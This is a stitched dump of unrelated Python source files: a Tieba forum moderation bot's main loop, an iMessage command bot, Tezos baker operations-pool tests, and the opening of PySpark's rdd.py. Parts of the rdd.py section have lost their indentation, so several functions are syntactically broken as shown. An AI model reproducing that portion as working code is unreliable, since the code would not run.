formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s","%Y-%m-%d %H:%M:%S")
fh = logging.FileHandler('operate.log')
fh.setFormatter(formatter)
fh.setLevel(logging.INFO)
sh = logging.StreamHandler()
sh.setLevel(logging.INFO)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
# Log in with username/password (via selenium) to obtain a cookie
if enable_login_model:
    import tiebalib.login_model
    cookie_for_selenium = tiebalib.login_model.get_cookie_by_selenium(username, password)
    if tiebalib.login_model.try_cookie_logined(cookie_for_selenium):
        cookie = cookie_for_selenium
        print(cookie)
    else:
        logger.warning("通过selenium获取cookie失败,将使用config中的cookie")
tiebalib.initialize(aim_tieba,cookie)
logger.info("初始化完成")
comment_num = {}# maps post pid -> last known sub-comment count
is_failed = []# pids whose delete/ban attempt failed
is_succeed = []# pids successfully deleted/banned
# all of the above are keyed by post pid
work_thread_list = []
post_task_queue = queue.Queue()
comment_task_queue = queue.Queue()
posts_queue = queue.Queue()
comments_queue = queue.Queue()
# front-page spider thread
ts = threading.Thread(target=thread_spider,args=(),name="thread_spider")
work_thread_list.append(ts)
# post spider threads
for i in range(threading_num):
    ps = threading.Thread(target=post_spider,args=(),name="post_spider")
    work_thread_list.append(ps)
# first-page sub-comment spider threads
for i in range(threading_num):
    cs = threading.Thread(target=comment_spider,args=(),name="comment_spider")
    work_thread_list.append(cs)
# post / sub-comment handler threads
ph = threading.Thread(target=post_handler,args=(),name="post_handler")
ch = threading.Thread(target=comment_handler,args=(),name="comment_handler")
work_thread_list.append(ph)
work_thread_list.append(ch)
# start all worker threads
for work_thread in work_thread_list:
    work_thread.start()
while True:
    # Refresh keyword/whitelist config.
    # NOTE(review): re-running `from X import *` does NOT re-read an already
    # imported module, so this probably never picks up edited keyword files;
    # importlib.reload would be needed — confirm intended behavior.
    from keywords import *
    from author_keywords import *
    from whitelist import *
    # Restart any worker thread that has died.
    for index, work_thread in enumerate(work_thread_list):
        # Thread.isAlive() was removed in Python 3.9; use is_alive().
        if not work_thread.is_alive():
            # At module scope locals() is globals(); use globals() to make
            # the name lookup of the worker function explicit.
            new_thread = threading.Thread(target=globals()[work_thread.name],args=(),name=work_thread.name)
            work_thread_list[index] = new_thread
            new_thread.start()
    time.sleep(2)
|
Bot.py | from threading import Thread
import sqlite3
from time import sleep
import subprocess
from inspect import signature
from inspect import getmembers
from inspect import ismethod
from importlib import import_module
from .Message import Message, MessageSent
from .User import User
from .Image import Image
from .Errors import *
class bot():
    """iMessage chat bot.

    Polls the macOS Messages sqlite database (``chat.db``) for new
    messages and dispatches messages starting with a registered prefix as
    commands to methods of registered extension objects.
    """
    # When True, sendMessage prints instead of invoking AppleScript.
    DebugMode = False
    def __init__(self, prefixes):
        """Create a bot reacting to messages that start with any prefix.

        Args:
            prefixes: Non-empty list (or other iterable, converted with
                ``list()``) of command prefixes.

        Raises:
            InvalidPrefixes: If ``prefixes`` is None or an empty list.
        """
        if prefixes != None and prefixes != []:
            if isinstance(prefixes, list):
                self.prefixes = prefixes
            else:
                self.prefixes = list(prefixes)
        else:
            raise InvalidPrefixes(f"Prefixes: {prefixes} are not valid")
        self.extensions = []  # loaded extension instances
        self.extensionCommands = {}  # index -> {'Name': ..., 'Commands': [...]}
        self._running = False
        self.queue = []  # incoming Message objects awaiting processing
        self.database = "/Users/User/Library/Messages/chat.db"
        self.DefaultChat = ''
    def import_extension(self, extensionName):
        """Import a module by name and let its ``setup(bot)`` hook register
        its extensions with this bot.

        Args:
            extensionName: Importable module name exposing ``setup``.
        """
        temp = import_module(extensionName)
        temp.setup(self)
        return
    def add_extension(self, extension):
        """Register an extension instance and index its methods as commands.

        Args:
            extension: Object whose non-``__init__`` bound methods become
                invokable commands.
        """
        def get_methods(obj):
            """Return the names of obj's bound methods, minus ``__init__``."""
            ls = []
            for i in range(len(getmembers(obj, predicate=ismethod))):
                if getmembers(obj, predicate=ismethod)[i][0] != '__init__':
                    ls.append(getmembers(obj, predicate=ismethod)[i][0])
            return ls
        try:
            self.extensions.append(extension)
            try :
                # Continue numbering from the highest existing index.
                i = max(self.extensionCommands.keys())
                i += 1
                self.extensionCommands[i] = {'Name':type(self.extensions[i]).__name__, 'Commands':get_methods(self.extensions[i])}
            except:
                # First extension: max() on an empty dict raises ValueError.
                self.extensionCommands[0] = {'Name':type(self.extensions[0]).__name__, 'Commands':get_methods(self.extensions[0])}
            return
        except:
            print(f"Extension {extension} could not be loaded")
            return
    def run_command(self, message):
        """Parse a prefixed message and invoke the matching command.

        The first whitespace-separated token (minus the prefix) selects a
        command (case-insensitive); remaining tokens become positional
        arguments.  A parameter named ``ctx`` receives the literal string
        'ctx', and the final parameter absorbs all remaining words.

        Args:
            message: Incoming Message whose ``Text`` starts with a prefix.

        Returns:
            None normally, or ``NotEnoughArgs`` when too few arguments were
            supplied for the command.
        """
        if message.Text[0] in self.prefixes:
            text = message.Text[1:].split()
            command = text.pop(0)
            argdict = {}
            run = None
            # Search every registered extension for a matching command name.
            for i in self.extensionCommands:
                for j in self.extensionCommands[i]['Commands']:
                    if command.lower() == j.lower():
                        run = getattr(self.extensions[i],j)
                        break
            if run == None:
                print(f"Command {command} could not be found")
                return
            else:
                if len(signature(run).parameters) != 0:
                    for i in range(len(signature(run).parameters)):
                        if list(signature(run).parameters.keys())[i] == 'ctx':
                            argdict[f'arg{i}'] = 'ctx' #getctx()
                        elif i == (len(signature(run).parameters) - 1) and len(text) > 1:
                            # Last parameter swallows the rest of the message.
                            lastargument = ' '.join(text)
                            argdict[f'arg{i}'] = lastargument
                        elif len(text) > 0:
                            argdict[f'arg{i}'] = text.pop(0)
                        else:
                            print(f"ERROR: Not Enough Arguments for function: {command}")
                            return NotEnoughArgs
                    run(*argdict.values())
                    return
                else:
                    run()
                    return
        else:
            print(f"Passed invalid message: {message}")
            return
    def sendMessage(self, Chat, Message):
        """Send a text to a chat via AppleScript (or print in DebugMode).

        Args:
            Chat: Target chat identifier passed to the AppleScript.
            Message: Text to send.

        Returns:
            MessageSent after a real send, None in DebugMode.
        """
        if bot.DebugMode != True:
            subprocess.run(["osascript","./iMessage/sendMessage.scpt",Chat,Message])
            return MessageSent
        else:
            print(f"Message: '{Message}' sent to Chat:{Chat}")
            return
    def getData(self):
        """Poll chat.db for new messages and append them to the queue.

        Starts from the newest row currently in the database and advances
        one row at a time.  Runs until ``stop()`` clears ``_running``;
        intended to run in its own thread (see ``start()``).
        """
        conn = sqlite3.connect(self.database)
        c = conn.cursor()
        # Start from the newest message currently in the database.
        rowId = c.execute("SELECT * FROM message ORDER BY ROWID DESC LIMIT 1;").fetchone()[0]
        #currentMessage = Message(rowId)
        #self.queue.append(currentMessage)
        conn.close()
        while self._running == True:
            conn = sqlite3.connect(self.database)
            c = conn.cursor()
            currentMessage = Message(rowId)
            if currentMessage.FullMessage != None:
                # A row exists for this id: queue it and advance.
                rowId += 1
                print(f"Now Processing Row: {rowId}", end="\r")
                self.queue.append(currentMessage)
            conn.close()
            sleep(0.2)
    def processData(self):
        """Drain the queue, dispatching prefixed messages as commands.

        Runs until ``stop()`` clears ``_running``; intended to run in its
        own thread (see ``start()``).
        """
        while self._running == True:
            if len(self.queue) != 0:
                temp = self.queue.pop(0)
                if temp.Text != None:
                    if temp.Text[0] in self.prefixes:
                        self.run_command(temp)
                temp.storeData()
            sleep(0.5)
    def start(self):
        """Start the polling and processing threads (no-op if running)."""
        if self._running == True:
            print("The Bot is already running")
            return
        else:
            self._running = True
            self.t1 = Thread(target = self.getData)
            self.t2 = Thread(target = self.processData)
            self.t1.start()
            self.t2.start()
            return
    def stop(self):
        """Signal both worker threads to finish and wait for them."""
        self._running = False
        self.t1.join()
        self.t2.join()
        return
    def restart(self):
        """Stop then start the bot again."""
        self.stop()
        self.start()
        return
test_baker_operations_cli_options.py | """Simple tests to check support for the following operations-related options
for baking
- --ignore-node-mempool
- --operations-pool [file|uri]
"""
import os
import os.path
import json
import time
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing import Process
from typing import List, Any
import pytest
from client.client import Client
from tools import constants, utils
from launchers.sandbox import Sandbox
from . import protocol
# Port used by the throwaway HTTP server (and by the tests' URLs).
PORT = 12121
# Directory and basenames of the JSON operation files used below.
OPERATIONS_FILES_DIRECTORY = "operations_files"
EMPTY_OPERATIONS = "empty_operations"
ABSENT_OPERATIONS = "this_file_should_not_exist"
SINGLETON_OPERATIONS = "singleton_operations"
TEST_DIR = "tests_alpha"
class MyHttpServer:
    """Simple HTTP server serving the current directory from a child process."""
    def __init__(self):
        # The socket is bound here, at construction time, on localhost:PORT.
        self.server = HTTPServer(('localhost', PORT), SimpleHTTPRequestHandler)
        self.process = Process(target=self.server.serve_forever, args=())
    def run(self):
        """Start serving in the child process."""
        self.process.start()
    def close(self):
        """Release the listening socket and terminate the child process."""
        self.server.server_close()
        self.process.terminate()
@pytest.fixture
def http_server():
    """Yield a running local HTTP server; shut it down at teardown."""
    server = MyHttpServer()
    server.run()
    yield server
    server.close()
def get_filename(basename: str) -> str:
    """Return the path of the operations JSON file named *basename*."""
    return os.path.join(TEST_DIR, OPERATIONS_FILES_DIRECTORY, basename + ".json")
class TestIgnoreNodeMempool:
    """Tests for the baker's --ignore-node-mempool option."""
    def test_ignore(self, client: Client):
        """Check that a transfer injected into the node is dutifully ignored
        when baking with --ignore-node-mempool
        """
        sender = "bootstrap4"
        balance0 = client.get_balance(sender)
        client.transfer(2, sender, 'bootstrap5')
        utils.bake(
            client, bake_args=['--minimal-timestamp', "--ignore-node-mempool"]
        )
        balance1 = client.get_balance(sender)
        # Make sure the operations has not been included, indirectly through
        # balance checks
        assert balance1 == balance0
        assert client.get_level() == 2
    def test_no_ignore(self, client: Client):
        """Check that a transfer injected, then ignored, can be injected at the
        next block"""
        sender = "bootstrap4"
        balance0 = client.get_balance(sender)
        # The transfer from test_ignore is still in the mempool and should
        # now be included by a normal bake.
        utils.bake(client, bake_args=['--minimal-timestamp'])
        balance1 = client.get_balance(sender)
        assert balance1 != balance0
        assert client.get_level() == 3
def all_empty(lls: List[List[Any]]) -> bool:
    """True iff every inner list is empty."""
    return all(not inner for inner in lls)
def only_has_endorsements(lls: List[List[Any]]) -> bool:
    """True iff every operation list except the first is empty."""
    return all(not ops for ops in lls[1:])
def mempool_to_operations(mempool):
    """Strip the mempool's applied entries down to injectable operations,
    keeping only branch, contents and signature."""
    return [
        {
            'branch': applied['branch'],
            'contents': applied['contents'],
            'signature': applied['signature'],
        }
        for applied in mempool['applied']
    ]
def get_operations(client: Client) -> List[dict]:
    """Return the client's applied mempool as bare operations."""
    mempool = client.get_mempool()
    return mempool_to_operations(mempool)
class TestExternalOperations:
    """Tests for baking with --operations-pool (file and HTTP sources)."""
    def test_bake_empty_operations_file(self, client: Client):
        """Baking with an empty operations file yields an empty block."""
        level = client.get_level()
        utils.bake(
            client,
            bake_args=[
                '--minimal-timestamp',
                "--operations-pool",
                get_filename(EMPTY_OPERATIONS),
            ],
        )
        assert client.get_level() == level + 1
        head = client.get_head()
        assert all_empty(head['operations'])
    # http_server is a fixture that auto- runs and closes said HTTP server
    # pylint: disable=W0613
    def test_bake_empty_operations_http(self, client: Client, http_server):
        """Baking with an empty operations file served over HTTP."""
        level = client.get_level()
        utils.bake(
            client,
            bake_args=[
                '--minimal-timestamp',
                "--operations-pool",
                f"http://localhost:{PORT}/{get_filename(EMPTY_OPERATIONS)}",
            ],
        )
        assert client.get_level() == level + 1
        head = client.get_head()
        assert only_has_endorsements(head['operations'])
    def test_bake_absent_operations_file(self, client: Client):
        """The absent resource should simply be ignored."""
        level = client.get_level()
        utils.bake(
            client,
            bake_args=[
                '--minimal-timestamp',
                "--operations-pool",
                f"{ABSENT_OPERATIONS}",
            ],
        )
        assert client.get_level() == level + 1
        head = client.get_head()
        assert only_has_endorsements(head['operations'])
    # pylint: disable=W0613
    def test_bake_absent_operations_http(self, client: Client, http_server):
        """The absent resource should simply be ignored."""
        level = client.get_level()
        utils.bake(
            client,
            bake_args=[
                '--minimal-timestamp',
                "--operations-pool",
                # any fake URL would do here
                f"http://localhost:{PORT}/{ABSENT_OPERATIONS}",
            ],
        )
        assert client.get_level() == level + 1
        head = client.get_head()
        assert only_has_endorsements(head['operations'])
    def test_bake_singleton_operations_file_pre(
        self, client: Client, session: dict
    ):
        """Construct a transaction over the current state, and bake it.
        Store it into the context to serves as a dynamic oracle for the next
        steps.
        """
        sender = 'bootstrap2'
        balance0 = client.get_mutez_balance(sender)
        session['amount'] = 2
        client.transfer(session['amount'], sender, 'bootstrap3')
        # Baking
        utils.bake(client, bake_args=['--minimal-timestamp'])
        balance1 = client.get_mutez_balance(sender)
        # Includes the transferred amount plus fees.
        session['difference'] = balance0 - balance1
        assert session['difference'] >= session['amount']
        utils.bake(client)
    def test_bake_singleton_operations_file(
        self, client: Client, session: dict
    ):
        """Construct a transaction over the current state, put it into a file,
        and bake it into the chain through --operations-pool option.
        This additionally compares the balance to a normal transfer (through the
        node's mempool) to check that there is no observable difference in
        behaviors between passing through a node's mempool or a hand-rolled
        operations file.
        """
        sender = 'bootstrap4'
        balance0 = client.get_mutez_balance(sender)
        client.transfer(session['amount'], sender, 'bootstrap3')
        pending_ops = get_operations(client)
        assert len(pending_ops) == 1
        assert len(pending_ops[0]['contents']) == 1
        # Write the transaction to a file
        file = get_filename(SINGLETON_OPERATIONS)
        with open(file, 'w') as fdesc:
            fdesc.write(json.dumps(pending_ops))
        # Baking
        utils.bake(
            client,
            bake_args=[
                '--minimal-timestamp',
                "--operations-pool",
                file,
                '--ignore-node-mempool',
            ],
        )
        balance1 = client.get_mutez_balance(sender)
        # Same balance delta as the mempool-based transfer in the pre step.
        assert balance0 - balance1 == session['difference']
        # cleanup the generated file
        os.remove(file)
    # pylint: disable=W0613
    def test_bake_singleton_operations_http(
        self, client: Client, sandbox: Sandbox, session: dict, http_server
    ):
        """Same as the file-based test, but serving the operations over HTTP
        after a node restart (which clears the node's mempool)."""
        # Restart
        sandbox.node(0).terminate()
        time.sleep(3)
        sandbox.node(0).run()
        client.check_node_listening()
        sender = 'bootstrap2'
        balance0 = client.get_mutez_balance(sender)
        client.transfer(session['amount'], sender, 'bootstrap3')
        pending_ops = get_operations(client)
        assert len(pending_ops) == 1
        assert len(pending_ops[0]['contents']) == 1
        # Write the transaction to a file
        file = get_filename(SINGLETON_OPERATIONS)
        with open(file, 'w') as fdesc:
            fdesc.write(json.dumps(pending_ops))
        utils.bake(
            client,
            bake_args=[
                '--minimal-timestamp',
                "--operations-pool",
                f"http://localhost:{PORT}/{file}",
                '--ignore-node-mempool',
            ],
        )
        sandbox.client(0).rpc('get', '/chains/main/blocks/head')
        balance1 = client.get_mutez_balance(sender)
        assert balance0 - balance1 == session['difference']
        # cleanup the generated file
        os.remove(file)
# The 5 bootstrap accounts (bootstrap1 .. bootstrap5)
ALL_BOOTSTRAP_ACCOUNTS = [f'bootstrap{i + 1}' for i in range(5)]
@pytest.mark.incremental
class TestBakerExternalOperations:
    """Test adding an external operations source (file) to a baker daemon"""
    def test_init(self, sandbox: Sandbox):
        """Start a node and activate the protocol with 1-second blocks."""
        sandbox.add_node(0, params=constants.NODE_PARAMS)
        parameters = protocol.get_parameters()
        parameters['minimal_block_delay'] = "1"
        parameters["delay_increment_per_round"] = "1"
        protocol.activate(
            sandbox.client(0),
            parameters=parameters,
            activate_in_the_past=False,
        )
    def test_gen_operations(self, sandbox: Sandbox, session: dict):
        """Generate a transfer operation and save it to a file"""
        client = sandbox.client(0)
        client.multibake(args=['--minimal-timestamp'])
        client.transfer(3, 'bootstrap1', 'bootstrap3')
        client.multibake(args=['--minimal-timestamp'])
        client.multibake(args=['--minimal-timestamp'])
        # We are now at level 2, next block at level 4
        level = client.get_level()
        session['level'] = level
        assert level == 4
        assert len(get_operations(client)) == 0
        time.sleep(3)
        session['transfer_value'] = 2
        client.transfer(session['transfer_value'], 'bootstrap1', 'bootstrap3')
        pending_ops = get_operations(client)
        # Write the transaction to a file
        filename = get_filename(SINGLETON_OPERATIONS)
        session['operations_file'] = filename
        with open(filename, 'w') as fdesc:
            fdesc.write(json.dumps(pending_ops))
    def test_terminate_sandbox(self, sandbox: Sandbox):
        """Cleanup the node's mempool. Forget about the last transfer"""
        sandbox.node(0).terminate()
        # let the node end gracefully before restarting
        time.sleep(1)
    def test_baker(self, sandbox: Sandbox, session: dict):
        """Restart the node and add a baker daemon"""
        sandbox.node(0).run()
        assert sandbox.client(0).check_node_listening()
        assert os.path.isfile(session['operations_file'])
        # The baker reads the saved operations file as an external pool.
        sandbox.add_baker(
            0,
            ALL_BOOTSTRAP_ACCOUNTS,
            proto=protocol.DAEMON,
            log_levels=constants.TENDERBAKE_BAKER_LOG_LEVELS,
            run_params=[
                '--operations-pool',
                session['operations_file'],
                '--liquidity-baking-toggle-vote',
                'pass',
            ],
        )
    @pytest.mark.timeout(30)
    def test_wait_until_high_enough_level(
        self, sandbox: Sandbox, session: dict
    ):
        """Wait until we have seen enough blocks.
        This should not take much time."""
        while sandbox.client(0).get_level() < 2 * session['level']:
            time.sleep(1)
    def test_check_block_baked(self, sandbox: Sandbox, session: dict):
        """Check that block exactly contains the operations that we put into
        our operations file"""
        expected_level = session['level']
        block = sandbox.client(0).rpc(
            'get', f'/chains/main/blocks/{expected_level}'
        )
        # Validation pass 3 holds the manager operations (transfers).
        manager_ops = block['operations'][3]
        assert len(manager_ops) == 1
        assert int(
            manager_ops[0]['contents'][0]['amount']
        ) == utils.mutez_of_tez(session['transfer_value'])
    def test_check_block_after_baked(self, sandbox: Sandbox, session: dict):
        """Check that block is empty of operations"""
        level = session['level'] + 1
        block = sandbox.client(0).rpc('get', f'/chains/main/blocks/{level}')
        assert only_has_endorsements(block['operations'])
        # cleanup the operation file
        os.remove(session['operations_file'])
|
rdd.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import do_server_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
    """
    Evaluation type of python rdd.
    These values are internal to PySpark.
    These values should match values in org.apache.spark.api.python.PythonEvalType.
    """
    # Plain (non-UDF) Python RDD evaluation.
    NON_UDF = 0
    # SQL UDF variants; the numeric codes are mirrored on the JVM side,
    # so they must not be renumbered independently.
    SQL_BATCHED_UDF = 100
    SQL_SCALAR_PANDAS_UDF = 200
    SQL_GROUPED_MAP_PANDAS_UDF = 201
    SQL_GROUPED_AGG_PANDAS_UDF = 202
    SQL_WINDOW_AGG_PANDAS_UDF = 203
def portable_hash(x):
    """
    This function returns consistent hash code for builtin types, especially
    for None and tuple with None.
    The algorithm is similar to that one used by CPython 2.7
    >>> portable_hash(None)
    0
    >>> portable_hash((None, 1)) & 0xffffffff
    219750521
    """
    # String hashing must be deterministic across workers, so hash
    # randomization has to be disabled explicitly.
    if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
        raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
    if x is None:
        return 0
    if not isinstance(x, tuple):
        return hash(x)
    # CPython-2.7-style tuple hash, built from the portable hash of each item.
    result = 0x345678
    for item in x:
        result = ((result ^ portable_hash(item)) * 1000003) & sys.maxsize
    result ^= len(x)
    if result == -1:
        result = -2
    return int(result)
class BoundedFloat(float):
    """
    A float produced by an approximate job, annotated with the confidence
    level and the low/high bounds of the estimate.
    >>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
    100.0
    """
    def __new__(cls, mean, confidence, low, high):
        # The float value itself is the mean; the extra statistics ride
        # along as instance attributes.
        instance = super(BoundedFloat, cls).__new__(cls, mean)
        instance.confidence = confidence
        instance.low = low
        instance.high = high
        return instance
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
    """Connect to a local JVM-side server and deserialize its stream.

    :param sock_info: (port, auth_secret) pair identifying the server
    :param serializer: serializer whose load_stream decodes the data
    :return: an iterator over the deserialized elements
    :raises Exception: if no address family yields a working connection
    """
    port, auth_secret = sock_info
    sock = None
    # Support for both IPv4 and IPv6.
    # On most of IPv6-ready systems, IPv6 will take precedence.
    for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
        af, socktype, proto, canonname, sa = res
        sock = socket.socket(af, socktype, proto)
        try:
            # Short timeout only for the connect attempt itself.
            sock.settimeout(15)
            sock.connect(sa)
        except socket.error:
            # This address family failed; reset and try the next result.
            sock.close()
            sock = None
            continue
        break
    if not sock:
        raise Exception("could not open socket")
    # The RDD materialization time is unpredicable, if we set a timeout for socket reading
    # operation, it will very possibly fail. See SPARK-18281.
    sock.settimeout(None)
    sockfile = sock.makefile("rwb", 65536)
    # Mutual authentication with the JVM before any data is read.
    do_server_auth(sockfile, auth_secret)
    # The socket will be automatically closed when garbage-collected.
    return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
    """
    Ignore the 'u' prefix of string in doc tests, to make it works
    in both python 2 and 3

    :param f: the decorated function; its __doc__ is rewritten in place
    :return: `f` itself (decorator)
    """
    # Guard against functions without a docstring: re.sub(None) would
    # raise TypeError on Python 3.
    if sys.version >= '3' and f.__doc__ is not None:
        # the representation of unicode string in Python 3 does not have prefix 'u',
        # so remove the prefix 'u' for doc tests
        literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
        f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
    return f
class Partitioner(object):
    """Maps a key to a partition id via ``partitionFunc(k) % numPartitions``."""

    def __init__(self, numPartitions, partitionFunc):
        # Target partition count and the key-to-int hashing function.
        self.numPartitions = numPartitions
        self.partitionFunc = partitionFunc

    def __eq__(self, other):
        # Two partitioners are interchangeable only when both the partition
        # count and the hashing function match.
        if not isinstance(other, Partitioner):
            return False
        return (self.numPartitions == other.numPartitions
                and self.partitionFunc == other.partitionFunc)

    def __call__(self, k):
        return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
    def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
        """Wrap a Java-side RDD handle.

        :param jrdd: the underlying Java RDD object
        :param ctx: the SparkContext this RDD was created on
        :param jrdd_deserializer: serializer used to decode this RDD's data
        """
        self._jrdd = jrdd
        self.is_cached = False
        self.is_checkpointed = False
        self.ctx = ctx
        self._jrdd_deserializer = jrdd_deserializer
        self._id = jrdd.id()  # unique id within the SparkContext
        self.partitioner = None  # set by operations that establish partitioning
    def _pickled(self):
        # Reserialize this RDD with the default pickle-based batched serializer.
        return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
    def id(self):
        """
        A unique ID for this RDD (within its SparkContext).
        """
        # Cached at construction time from the Java RDD.
        return self._id
    def __repr__(self):
        # Delegate to the Java RDD's toString for the debug representation.
        return self._jrdd.toString()
    def __getnewargs__(self):
        """Always raise: RDDs must never be pickled (e.g. captured in a closure)."""
        # This method is called when attempting to pickle an RDD, which is always an error:
        raise Exception(
            "It appears that you are attempting to broadcast an RDD or reference an RDD from an "
            "action or transformation. RDD transformations and actions can only be invoked by the "
            "driver, not inside of other transformations; for example, "
            "rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
            "transformation and count action cannot be performed inside of the rdd1.map "
            "transformation. For more information, see SPARK-5063."
        )
    @property
    def context(self):
        """
        The L{SparkContext} that this RDD was created on.
        """
        return self.ctx
    def cache(self):
        """
        Persist this RDD with the default storage level (C{MEMORY_ONLY}).

        :return: this RDD, to allow call chaining
        """
        # Shorthand for persist() at the default storage level.
        self.is_cached = True
        self.persist(StorageLevel.MEMORY_ONLY)
        return self
    def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
        """
        Set this RDD's storage level to persist its values across operations
        after the first time it is computed. This can only be used to assign
        a new storage level if the RDD does not have a storage level set yet.
        If no storage level is specified defaults to (C{MEMORY_ONLY}).

        :param storageLevel: the target L{StorageLevel}
        :return: this RDD, to allow call chaining

        >>> rdd = sc.parallelize(["b", "a", "c"])
        >>> rdd.persist().is_cached
        True
        """
        self.is_cached = True
        # Translate the Python storage level into its JVM counterpart.
        javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
        self._jrdd.persist(javaStorageLevel)
        return self
    def unpersist(self):
        """
        Mark the RDD as non-persistent, and remove all blocks for it from
        memory and disk.

        :return: this RDD, to allow call chaining
        """
        self.is_cached = False
        self._jrdd.unpersist()
        return self
    def checkpoint(self):
        """
        Mark this RDD for checkpointing. It will be saved to a file inside the
        checkpoint directory set with L{SparkContext.setCheckpointDir()} and
        all references to its parent RDDs will be removed. This function must
        be called before any job has been executed on this RDD. It is strongly
        recommended that this RDD is persisted in memory, otherwise saving it
        on a file will require recomputation.
        """
        self.is_checkpointed = True
        self._jrdd.rdd().checkpoint()
    def isCheckpointed(self):
        """
        Return whether this RDD is checkpointed and materialized, either reliably or locally.
        """
        return self._jrdd.rdd().isCheckpointed()
    def localCheckpoint(self):
        """
        Mark this RDD for local checkpointing using Spark's existing caching layer.

        This method is for users who wish to truncate RDD lineages while skipping the expensive
        step of replicating the materialized data in a reliable distributed file system. This is
        useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).

        Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
        data is written to ephemeral local storage in the executors instead of to a reliable,
        fault-tolerant storage. The effect is that if an executor fails during the computation,
        the checkpointed data may no longer be accessible, causing an irrecoverable job failure.

        This is NOT safe to use with dynamic allocation, which removes executors along
        with their cached blocks. If you must use both features, you are advised to set
        L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.

        The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
        """
        self._jrdd.rdd().localCheckpoint()
    def isLocallyCheckpointed(self):
        """
        Return whether this RDD is marked for local checkpointing.

        Exposed for testing.
        """
        return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
    def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
        """
        Return a new RDD by applying a function to each partition of this RDD,
        while tracking the index of the original partition.

        >>> rdd = sc.parallelize([1, 2, 3, 4], 4)
        >>> def f(splitIndex, iterator): yield splitIndex
        >>> rdd.mapPartitionsWithIndex(f).sum()
        6
        """
        # All per-partition transformations funnel through PipelinedRDD,
        # which fuses consecutive maps into a single pass.
        return PipelinedRDD(self, f, preservesPartitioning)
